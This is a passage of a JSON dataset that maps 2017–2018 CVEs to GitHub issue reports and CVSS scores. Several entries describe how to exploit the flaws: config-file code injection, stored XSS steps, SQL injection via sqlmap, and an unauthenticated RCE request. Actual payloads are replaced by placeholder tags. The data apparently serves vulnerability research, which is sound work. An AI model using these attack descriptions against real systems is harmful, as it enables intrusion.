  16011. "description": "CMS Made Simple xss. User & group > group FILETAG FILETAG FILETAG",
  16012. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16013. "severity": "MEDIUM",
  16014. "baseScore": 6.1,
  16015. "impactScore": 2.7,
  16016. "exploitabilityScore": 2.8
  16017. },
  16018. {
  16019. "CVE_ID": "CVE-2017-9735",
  16020. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/1556",
  16021. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/1556",
  16022. "Repo_new": "eclipse/jetty.project",
  16023. "Issue_Created_At": "2017-05-16T07:33:48Z",
  16024. "description": "A timing channel in APITAG Hi, I found a timing channel in APITAG URLTAG By using APITAG it actually violates the \"constant time implementation\" discipline. For more information about timing attack: URLTAG",
  16025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16026. "severity": "HIGH",
  16027. "baseScore": 7.5,
  16028. "impactScore": 3.6,
  16029. "exploitabilityScore": 3.9
  16030. },
  16031. {
  16032. "CVE_ID": "CVE-2017-9741",
  16033. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/1",
  16034. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/1",
  16035. "Repo_new": "xiaozhis/projectsend",
  16036. "Issue_Created_At": "2017-06-17T02:35:39Z",
  16037. "description": "APITAG Code execution. The attacker can change the content of configuration file and constructing the dbprefix parameter to replace the TABLES_PREFIX of the configuration file with malicious code. So attacker can run malicious code remotely. code: if (isset($_POST FILETAG FILETAG",
  16038. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16039. "severity": "CRITICAL",
  16040. "baseScore": 9.8,
  16041. "impactScore": 5.9,
  16042. "exploitabilityScore": 3.9
  16043. },
  16044. {
  16045. "CVE_ID": "CVE-2017-9761",
  16046. "Issue_Url_old": "https://github.com/radare/radare2/issues/7727",
  16047. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7727",
  16048. "Repo_new": "radareorg/radare2",
  16049. "Issue_Created_At": "2017-06-12T13:22:40Z",
  16050. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD NUMBERTAG cba1d Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16051. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16052. "severity": "MEDIUM",
  16053. "baseScore": 5.5,
  16054. "impactScore": 3.6,
  16055. "exploitabilityScore": 1.8
  16056. },
  16057. {
  16058. "CVE_ID": "CVE-2017-9762",
  16059. "Issue_Url_old": "https://github.com/radare/radare2/issues/7726",
  16060. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7726",
  16061. "Repo_new": "radareorg/radare2",
  16062. "Issue_Created_At": "2017-06-12T12:45:13Z",
  16063. "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16064. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16065. "severity": "MEDIUM",
  16066. "baseScore": 5.5,
  16067. "impactScore": 3.6,
  16068. "exploitabilityScore": 1.8
  16069. },
  16070. {
  16071. "CVE_ID": "CVE-2017-9763",
  16072. "Issue_Url_old": "https://github.com/radare/radare2/issues/7723",
  16073. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7723",
  16074. "Repo_new": "radareorg/radare2",
  16075. "Issue_Created_At": "2017-06-11T17:11:00Z",
  16076. "description": "SIGSEGV APITAG large variable on stack) in APITAG SIGSEGV APITAG large variable on stack) in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind: ERRORTAG",
  16077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16078. "severity": "HIGH",
  16079. "baseScore": 7.5,
  16080. "impactScore": 3.6,
  16081. "exploitabilityScore": 3.9
  16082. },
  16083. {
  16084. "CVE_ID": "CVE-2017-9771",
  16085. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/3",
  16086. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/3",
  16087. "Repo_new": "xiaozhis/projectsend",
  16088. "Issue_Created_At": "2017-06-20T18:59:54Z",
  16089. "description": "wb Code execution. The attacker can change the content of configuration file and constructing the database_username And many other parameters to replace the DB_USERNAME of the configuration file with malicious code. So attacker can run malicious command remotely. code: $debug = false; if (true === $debug) { ini_set('display_errors NUMBERTAG error_reporting(E_ALL); } // Start a session if (!defined('SESSION_STARTED')) { session_name('wb installer'); APITAG define('SESSION_STARTED', true); } // get random part for APITAG list($usec,$sec) = explode(' APITAG APITAG NUMBERTAG session_rand = rand NUMBERTAG Function to set error function set_error($message, $field_name = '') { // global $_POST; if (isset($message) AND $message != '') { // Copy values entered into session so user doesn't have to re enter everything if (isset($_POST FILETAG",
  16090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16091. "severity": "CRITICAL",
  16092. "baseScore": 9.8,
  16093. "impactScore": 5.9,
  16094. "exploitabilityScore": 3.9
  16095. },
  16096. {
  16097. "CVE_ID": "CVE-2017-9780",
  16098. "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/845",
  16099. "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/845",
  16100. "Repo_new": "flatpak/flatpak",
  16101. "Issue_Created_At": "2017-06-12T16:22:42Z",
  16102. "description": "handling suid/world writable content. Breaking URLTAG out into an issue, since I think we need to do more design. A basic problem here is we have NUMBERTAG separate cases to handle: Flatpak default of APITAG (currently APITAG ) Endless OS case of APITAG (i.e. bare ) APITAG case In the original PR I was thinking of the APITAG case. For that, we have two sub options: Land fixups for APITAG to suppress all this Convert to APITAG Either way, I think we're going to need some sort of \"repository format change\" mechanism. Doing a local pull between APITAG and APITAG unfortunately will require duplicating all of the content right APITAG possibly we could teach ostree that it's fine to hardlink file content between them, and just delete all the APITAG xattrs after? System case Something like APITAG to APITAG ? We'd error out on finding world writable/setuid files. Also, we add a APITAG flag to APITAG which does the same thing as URLTAG but for the bare case?",
  16103. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16104. "severity": "HIGH",
  16105. "baseScore": 7.8,
  16106. "impactScore": 5.9,
  16107. "exploitabilityScore": 1.8
  16108. },
  16109. {
  16110. "CVE_ID": "CVE-2017-9782",
  16111. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/140",
  16112. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/140",
  16113. "Repo_new": "jasper-software/jasper",
  16114. "Issue_Created_At": "2017-06-14T04:00:33Z",
  16115. "description": "heap based buffer overflow in jp2_decode (jp2_dec.c). A heap overflow is found in jasper, and the tested commit is APITAG ERRORTAG Testcase: URLTAG",
  16116. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16117. "severity": "MEDIUM",
  16118. "baseScore": 5.5,
  16119. "impactScore": 3.6,
  16120. "exploitabilityScore": 1.8
  16121. },
  16122. {
  16123. "CVE_ID": "CVE-2017-9807",
  16124. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/620",
  16125. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/620",
  16126. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  16127. "Issue_Created_At": "2017-06-21T14:37:43Z",
  16128. "description": "Remote Code Execution on APITAG In line: URLTAG the APITAG call blindly executes any user supplied data. For example a remote unauthenticated attacker can use the following GET request to create a root owned file under APITAG on a APITAG NUMBERTAG HD se\" device: CODETAG We will be requesting a CVE for this issue and will report the CVE number once this becomes available, for issue coordination purposes.",
  16129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16130. "severity": "CRITICAL",
  16131. "baseScore": 9.8,
  16132. "impactScore": 5.9,
  16133. "exploitabilityScore": 3.9
  16134. },
  16135. {
  16136. "CVE_ID": "CVE-2017-9836",
  16137. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/716",
  16138. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/716",
  16139. "Repo_new": "piwigo/piwigo",
  16140. "Issue_Created_At": "2017-06-23T16:18:05Z",
  16141. "description": "Bug Report: Stored cross site scripting(XSS) in virtual_name parameter of FILETAG . Steps to reproduce NUMBERTAG Login to site as administrator NUMBERTAG create a new album FILETAG FILETAG NUMBERTAG enter the payload \"> APITAG payload has been base NUMBERTAG encode APITAG FILETAG FILETAG NUMBERTAG now you can see this script execute everywhere FILETAG Evironment: Windows XP Professional Apache APITAG PHP NUMBERTAG discovered by: topsec(lizhiqiang)",
  16142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  16143. "severity": "MEDIUM",
  16144. "baseScore": 4.8,
  16145. "impactScore": 2.7,
  16146. "exploitabilityScore": 1.7
  16147. },
  16148. {
  16149. "CVE_ID": "CVE-2017-9841",
  16150. "Issue_Url_old": "https://github.com/sebastianbergmann/phpunit/issues/1955",
  16151. "Issue_Url_new": "https://github.com/sebastianbergmann/phpunit/issues/1955",
  16152. "Repo_new": "sebastianbergmann/phpunit",
  16153. "Issue_Created_At": "2015-11-17T17:46:31Z",
  16154. "description": "MENTIONTAG fails when running tests with phpdbg qrr. Running tests in a separate process does not work when run with the APITAG",
  16155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16156. "severity": "CRITICAL",
  16157. "baseScore": 9.8,
  16158. "impactScore": 5.9,
  16159. "exploitabilityScore": 3.9
  16160. },
  16161. {
  16162. "CVE_ID": "CVE-2017-9846",
  16163. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/1",
  16164. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/1",
  16165. "Repo_new": "zhonghaozhao/winmail",
  16166. "Issue_Created_At": "2017-06-23T13:25:52Z",
  16167. "description": "winmail. FILETAG",
  16168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16169. "severity": "HIGH",
  16170. "baseScore": 8.8,
  16171. "impactScore": 5.9,
  16172. "exploitabilityScore": 2.8
  16173. },
  16174. {
  16175. "CVE_ID": "CVE-2017-9847",
  16176. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/2099",
  16177. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/2099",
  16178. "Repo_new": "arvidn/libtorrent",
  16179. "Issue_Created_At": "2017-06-23T10:13:48Z",
  16180. "description": "heap based buffer overflow in function APITAG Please provide the following information libtorrent version (or branch): the latest version NUMBERTAG platform/architecture: linu NUMBERTAG compiler and compiler version: clang NUMBERTAG please describe what symptom you see, what you would expect to see instead and how to reproduce it. Summary: There is a heap based buffer overflow in the libtorrent library. POC download: FILETAG Description: The debugging information is as follows: $ APITAG POC1 APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eff2 at pc NUMBERTAG fc NUMBERTAG e3c NUMBERTAG a bp NUMBERTAG ffc3f6ac NUMBERTAG sp NUMBERTAG ffc3f6ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eff2 thread T NUMBERTAG fc NUMBERTAG e3c NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG c NUMBERTAG f6 ( PATHTAG NUMBERTAG df1b6 ( PATHTAG NUMBERTAG dea5f ( PATHTAG NUMBERTAG fc NUMBERTAG ed3da3f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG eff2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG dd7e2 ( PATHTAG NUMBERTAG fc NUMBERTAG fe NUMBERTAG PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING This vulnerability was triggered in function APITAG at line APITAG NUMBERTAG char const parse_int(char const start, char const end, char delimiter NUMBERTAG boost::int NUMBERTAG t& val, APITAG ec NUMBERTAG while (start < end && start != delimiter NUMBERTAG if (!numeric( start NUMBERTAG int bdecode(char const start, char const end, bdecode_node& ret NUMBERTAG error_code& ec, int error_pos, int depth_limit, int token_limit NUMBERTAG default NUMBERTAG start NUMBERTAG APITAG e = bdecode_errors::no_error NUMBERTAG start = parse_int(start, end, ':', len, e); ... Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16181. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16182. "severity": "MEDIUM",
  16183. "baseScore": 5.5,
  16184. "impactScore": 3.6,
  16185. "exploitabilityScore": 1.8
  16186. },
  16187. {
  16188. "CVE_ID": "CVE-2017-9848",
  16189. "Issue_Url_old": "https://github.com/Akityo/TOPSEC/issues/1",
  16190. "Issue_Url_new": "https://github.com/akityo/topsec/issues/1",
  16191. "Repo_new": "Akityo/TOPSEC",
  16192. "Issue_Created_At": "2017-06-27T14:58:53Z",
  16193. "description": "SQL injection vulnerability in APITAG in APITAG in Easysite NUMBERTAG soap\u6ce8\u5165 easysite webservice \u6587\u4ef6\uff1a FILETAG FILETAG APITAG parameter FILETAG FILETAG run in sqlmap POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Type: text/xml; charset=utf NUMBERTAG Content Length: length APITAG \" URLTAG \" APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  16194. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16195. "severity": "CRITICAL",
  16196. "baseScore": 9.8,
  16197. "impactScore": 5.9,
  16198. "exploitabilityScore": 3.9
  16199. },
  16200. {
  16201. "CVE_ID": "CVE-2017-9868",
  16202. "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/468",
  16203. "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/468",
  16204. "Repo_new": "eclipse/mosquitto",
  16205. "Issue_Created_At": "2017-06-21T22:00:27Z",
  16206. "description": "mosquitto.db can be read by all [SECURITY]. mosquitto.db file is world readable. This is, obviously, leading to the possibility of every local user to read the topic database and values at any given time. (permission rw r r ). A security vulnerability such as this may prove disastorous to sensitive or secret data that can be contained within it. Mitigation will be scoping the permission scheme to a specific user, that is running the mosquitto service. Tested on an up to date raspberry pi NUMBERTAG with the latest release of mosquitto.",
  16207. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  16208. "severity": "MEDIUM",
  16209. "baseScore": 5.5,
  16210. "impactScore": 3.6,
  16211. "exploitabilityScore": 1.8
  16212. },
  16213. {
  16214. "CVE_ID": "CVE-2017-9928",
  16215. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/74",
  16216. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/74",
  16217. "Repo_new": "ckolivas/lrzip",
  16218. "Issue_Created_At": "2017-05-13T12:04:28Z",
  16219. "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  16220. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16221. "severity": "MEDIUM",
  16222. "baseScore": 5.5,
  16223. "impactScore": 3.6,
  16224. "exploitabilityScore": 1.8
  16225. },
  16226. {
  16227. "CVE_ID": "CVE-2017-9929",
  16228. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/75",
  16229. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/75",
  16230. "Repo_new": "ckolivas/lrzip",
  16231. "Issue_Created_At": "2017-05-13T12:06:14Z",
  16232. "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  16233. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16234. "severity": "MEDIUM",
  16235. "baseScore": 5.5,
  16236. "impactScore": 3.6,
  16237. "exploitabilityScore": 1.8
  16238. },
  16239. {
  16240. "CVE_ID": "CVE-2017-9949",
  16241. "Issue_Url_old": "https://github.com/radare/radare2/issues/7683",
  16242. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7683",
  16243. "Repo_new": "radareorg/radare2",
  16244. "Issue_Created_At": "2017-06-05T09:21:52Z",
  16245. "description": "Stack buffer underflow in APITAG Stack buffer underflow in APITAG Git HEAD: APITAG Payload in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16246. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16247. "severity": "HIGH",
  16248. "baseScore": 7.8,
  16249. "impactScore": 5.9,
  16250. "exploitabilityScore": 1.8
  16251. },
  16252. {
  16253. "CVE_ID": "CVE-2017-9988",
  16254. "Issue_Url_old": "https://github.com/libming/libming/issues/85",
  16255. "Issue_Url_new": "https://github.com/libming/libming/issues/85",
  16256. "Repo_new": "libming/libming",
  16257. "Issue_Created_At": "2017-06-23T14:15:10Z",
  16258. "description": "There is crash in listswf tool of libming . A crafted input can lead to a APITAG damage.. POC is got from FILETAG Description: The debugging information is as follows: $ ./listswf POC1 there is overflow in function APITAG that lead to malloc a large size of memory failure. It makes the program crash in APITAG the details is below. APITAG nsset APITAG = APITAG NUMBERTAG APITAG nsset >NS = malloc(sizeof(U NUMBERTAG nsset APITAG malloc failure, return NULL APITAG nsset >NS[i] = APITAG //cause NULL pointer DEF $gdb ./listswf (gdb) set args POC1 (gdb) r ... (gdb) bt NUMBERTAG APITAG (f=<optimized out>, nsset=<optimized out>, f=<optimized out>) at APITAG NUMBERTAG APITAG (cpool NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG f NUMBERTAG at APITAG NUMBERTAG b4 in APITAG (f NUMBERTAG length NUMBERTAG at APITAG NUMBERTAG in APITAG (f NUMBERTAG length NUMBERTAG header=<optimized out>) at APITAG NUMBERTAG f NUMBERTAG in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16260. "severity": "MEDIUM",
  16261. "baseScore": 6.5,
  16262. "impactScore": 3.6,
  16263. "exploitabilityScore": 2.8
  16264. },
  16265. {
  16266. "CVE_ID": "CVE-2017-9989",
  16267. "Issue_Url_old": "https://github.com/libming/libming/issues/86",
  16268. "Issue_Url_new": "https://github.com/libming/libming/issues/86",
  16269. "Repo_new": "libming/libming",
  16270. "Issue_Created_At": "2017-06-23T14:17:45Z",
  16271. "description": "There is crash in listswf tool of libming by a crafted input that will lead to a APITAG damage.. The POC is got from FILETAG Description: The debugging information is as follows: There is previous incorrect operation cause si >size too large that make malloc memory failure. It leads the program crash in APITAG , the details is below. APITAG buffer = malloc(si APITAG APITAG is too large buffer is NULL,malloc failure APITAG memset(buffer NUMBERTAG si APITAG NULL pointer deference $gdb ./listswf (gdb) set args POC2 (gdb) r ... (gdb) bt (gdb) bt NUMBERTAG memset_sse2 () at PATHTAG NUMBERTAG e0f3 in APITAG (si=<optimized out>) at APITAG NUMBERTAG APITAG (abc=<optimized out>, APITAG out>) at APITAG NUMBERTAG ec NUMBERTAG in APITAG (abc NUMBERTAG mi NUMBERTAG ffff NUMBERTAG f8) at APITAG NUMBERTAG ff NUMBERTAG in APITAG (abc NUMBERTAG at APITAG NUMBERTAG b0ca in APITAG (type=<optimized out>, blockp NUMBERTAG stream=<optimized out>) at APITAG NUMBERTAG c6 in APITAG (f=<optimized out>) at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16273. "severity": "MEDIUM",
  16274. "baseScore": 6.5,
  16275. "impactScore": 3.6,
  16276. "exploitabilityScore": 2.8
  16277. },
  16278. {
  16279. "CVE_ID": "CVE-2018-0608",
  16280. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1775",
  16281. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1775",
  16282. "Repo_new": "h2o/h2o",
  16283. "Issue_Created_At": "2018-05-31T13:46:42Z",
  16284. "description": "TBD.",
  16285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16286. "severity": "CRITICAL",
  16287. "baseScore": 9.8,
  16288. "impactScore": 5.9,
  16289. "exploitabilityScore": 3.9
  16290. },
  16291. {
  16292. "CVE_ID": "CVE-2018-0787",
  16293. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/295",
  16294. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/295",
  16295. "Repo_new": "aspnet/announcements",
  16296. "Issue_Created_At": "2018-03-13T17:07:23Z",
  16297. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core versions NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security vulnerability in all public versions of ASP.NET Core where an elevation of privilege vulnerability exists when a ASP.NET Core web application fails to validate web requests correctly. Discussion Discussion for this issue can be found at URLTAG Mitigation factors Sites are not vulnerable to this elevation of privilege when: The site is hosted behind a proxy, such as Internet Information Services (IIS), NGINX, or Apache, where: The proxy validates the host header, and The proxy is configured to listen on fully qualified domain names or The proxy is configured with a wildcard subdomain where the root domain is fully controlled by the site owner. For example, if IIS is configured to respond to requests for APITAG or APITAG hosts, the application is protected. If IIS is configured to respond to any request from any host, the application is vulnerable. Kestrel does not have the capability to validate host headers and is vulnerable if not placed behind a proxy that performs the host header validation. Apps hosted in Azure Web Apps are not susceptible to this vulnerability. APITAG APITAG Affected software Any ASP.NET Core hosted application which is directly exposed to the internet, or hosted behind a proxy which does not validate or restict host headers to known good values. The vulnerability also affects any ASP.NET Core NUMBERTAG project if it uses the following package versions, which must also be updated app update , in addition to addressing your proxy configuration : Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG and later APITAG NUMBERTAG and later No patches are available for ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG Microsoft requires that you place your NUMBERTAG ASP.NET Core application behind a proxy. You must address the configuration of your proxy to protect your application. If you're not running ASP.NET Core NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and add the host validating middleware provided at FILETAG Advisory FAQ How do I know if I am affected? Review the server and proxy configuration instructions configuration below to see if your system is configured correctly, and adjust the configuration if necessary. How do I fix the issue? You must address the configuration configuration of your server or proxy to protect your application to limit requests to known hosts. If you're not running Kestrel NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and follow the NUMBERTAG instructions below. ASP.NET Core NUMBERTAG applications must update your code app update to fully protect your application. APITAG APITAG Server and Proxy configuration You must examine your externally facing server or proxy configuration and ensure it requires host headers with fully qualified domain names, or known sub domains if you are using sub domain wild cards. ASP.NET Core applications behind IIS URLTAG To configure IIS to only respond to know hosts: Open IIS Manager. Expand the Sites node for the machine you want to configure. Select the site by clicking on the site. In the Actions list on the right hand side of IIS Manager, click Bindings . Edit any bindings that do not have a host name to specify one. Do not use a APITAG wildcard unless it's against a domain under your control. For example, APITAG is safe, APITAG is not. ASP.NET Core applications running publicly on Kestrel URLTAG Kestrel does not have the capability to validate host headers. It must either be placed behind a proxy that performs the host header validation or the validation must be performed within the application by adding host filtering middleware provided at URLTAG You must also update your dependencies app update to fully protect your application. ASP.NET Core applications running on FILETAG To configure URL prefixes and ports, you can use the APITAG extension method, the urls command line argument, the ASPNETCORE_URLS environment variable, or the APITAG property on APITAG URLTAG . The following code example uses APITAG . CODETAG ASP.NET Core applications behind NGINX URLTAG To configure NGINX as a reverse proxy to forward requests to your ASP.NET Core app, replace the contents PATHTAG with the following: CODETAG Note that with NGINX, when there is no match for APITAG , NGINX will pick the default server. If no default server has been defined, the first server in the conf file is the default server. Best practice is to add a specific default server which returns a status code of NUMBERTAG in the conf file. An example default server configuration would be as follows: APITAG With the preceding configuration file and default server, NGINX accepts public traffic on port NUMBERTAG with host header APITAG or APITAG . Requests not matching these hosts won't get forwarded to Kestrel. NGINX forwards the matching requests to Kestrel at APITAG . See FILETAG for more information. Once the NGINX configuration is established, run APITAG to verify the syntax of the configuration files. If the configuration file test is successful, force NGINX to pick up the changes by running APITAG . ASP.NET Core applications behind Apache URLTAG Configuration files for Apache are located within the APITAG directory. Any file with the APITAG extension: Is processed in alphabetical order, and The module configuration files in APITAG are processed. The module configuration files in APITAG contain any configuration files necessary to load modules. CODETAG The APITAG block can appear multiple times, in one or more files on a server. In the preceding configuration file, Apache accepts public traffic on port NUMBERTAG The domain APITAG is being served, and the APITAG alias resolves to the same website. See FILETAG for more information. Requests are proxied at the root to port NUMBERTAG of the server at APITAG For bi directional communication, APITAG and APITAG are required. Save the file and test the configuration. If everything passes, the response is APITAG . bash sudo service httpd configtest Restart Apache: bash sudo systemctl restart httpd sudo systemctl enable httpd APITAG APITAG ASP.NET Core NUMBERTAG application code updates If you're targeting .NET Core NUMBERTAG and the APITAG \"metapackage\": Update its version number to NUMBERTAG or later. Updating will pull in the fixed packages listed above. If you're targeting .NET Framework, update the packages listed above to their safe version or later. If your application is using Kestrel without a proxy or the APITAG functionality APITAG with APITAG you must also add the host filtering middleware provided at URLTAG .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. You must follow the update instructions below to address both types of dependency. Direct dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by examining your csproj file. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable: In the Visual Studio Solution Explorer window, which supports searching. By examining the FILETAG file contained in the obj directory of your project. The FILETAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. Fixing direct dependencies \u2013 Projects targeting .NET Core Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable metapackage, as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to a secure package version. In this example, update APITAG to NUMBERTAG or later. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Fixing direct dependencies \u2013 Projects targeting .NET Framework Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an 